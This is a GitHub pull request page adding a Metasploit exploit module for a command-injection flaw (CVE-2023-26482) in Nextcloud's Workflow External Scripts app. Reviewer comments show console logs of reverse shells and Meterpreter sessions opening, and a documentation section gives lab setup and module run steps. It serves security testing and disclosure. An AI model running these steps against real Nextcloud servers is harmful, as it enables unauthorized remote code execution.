Add exploit module for the nextcloud workflow vulnerability CVE-2023-26482 #20020
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
dledda-r7
reviewed
Apr 11, 2025
There was a problem hiding this comment.
Exploit seemed to be working:
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > exploit
[*] Started reverse TCP handler on 192.168.168.152:4444
[*] Sending payload..
[+] Workflow created
[*] Waiting for the payload to connect back ..
[*] Sending stage (3045380 bytes) to 192.168.168.151
[*] Meterpreter session 2 opened (192.168.168.152:4444 -> 192.168.168.151:44250) at 2025-04-16 11:08:26 +0200
[+] Payload connected!
[*] Cleaning up
meterpreter > sysinfo
Computer : 172.18.0.3
OS : Debian 11.5 (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
msutovsky-r7
previously requested changes
May 1, 2025
msutovsky-r7
reviewed
May 5, 2025
Co-authored-by: Diego Ledda <[email protected]>
Co-authored-by: Diego Ledda <[email protected]>
Co-authored-by: Diego Ledda <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
Co-authored-by: Diego Ledda <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
whotwagner
force-pushed
the
exploit_nextcloud_workflows
branch
from
ee1cfc0 to
22b80bb
Compare
documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Hi @whotwagner , I've left some final comments which address cases of unexpected responses. Apart from that, I think the module should be ready:
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run
[*] Started reverse TCP handler on 192.168.168.158:8000
[*] Sending payload..
[+] Workflow created
[*] Sending stage (3045380 bytes) to 192.168.168.146
[*] Meterpreter session 2 opened (192.168.168.158:8000 -> 192.168.168.146:52334) at 2025-05-15 09:00:16 +0200
[*] Cleaning up
meterpreter > sysinfo
Computer : 172.18.0.3
OS : Debian 11.5 (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Co-authored-by: msutovsky-r7 <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
Co-authored-by: msutovsky-r7 <[email protected]>
msutovsky-r7
approved these changes
May 15, 2025
github-project-automation
bot
moved this from Waiting on Contributor
to In Progress
in Metasploit Kanban
|
Thanks @whotwagner for your contribution! |
msutovsky-r7
added
the
rn-modules
Release NotesThis adds a module for Nextcloud Workflow (CVE-2023-26482). Exploitation requires set of a valid credentials. The Nextcloud needs to have |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module exploits a command injection that leads to a remote execution in Nextcloud installations if the app Workflow External Scripts is also installed. The vulnerability affects Nextcloud versions >= 24.0.0, >= 25.0.0, >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0, >= 25.0.0
Verification
This nextcloud-installation was created in a Virtualbox VM with the following specs:
This exploit was tested against a nextcloud docker container and docker-compose with the following docker-compose.yml:
NOTE: Change the IP-address and port for NEXTCLOUD_TRUSTED_DOMAINS for your setup
After
docker compose up -dlogin as admin and install the workflow app: "Workflow external script" andcreate a low privileged user
alice. Make sure that you choose "Cron(Recommended)" in the Settings for "Background Jobs".Before we can run the exploit, we need to start the cronjob. This is crucial because otherwise the
payload doesn't get triggered:
Wait until you the watch-command outputs something like: "Every 2.0s: php cron.php".
Verification Steps
NOTE: In my setup the msf-framework was installed on a different host. If you install it on the nextcloud-host, make sure that you change FETCH_SRVPORT: set FETCH_SRVPORT 8081
Example steps in this format (is also in the PR):
use exploit/unix/webapp/nextcloud_workflows_rceset RHOSTS [ips]set LHOST [lhost]set RPORT 8080set USERNAME aliceset PASSWORD alice-passwordrunThe following demo shows how to use the exploit: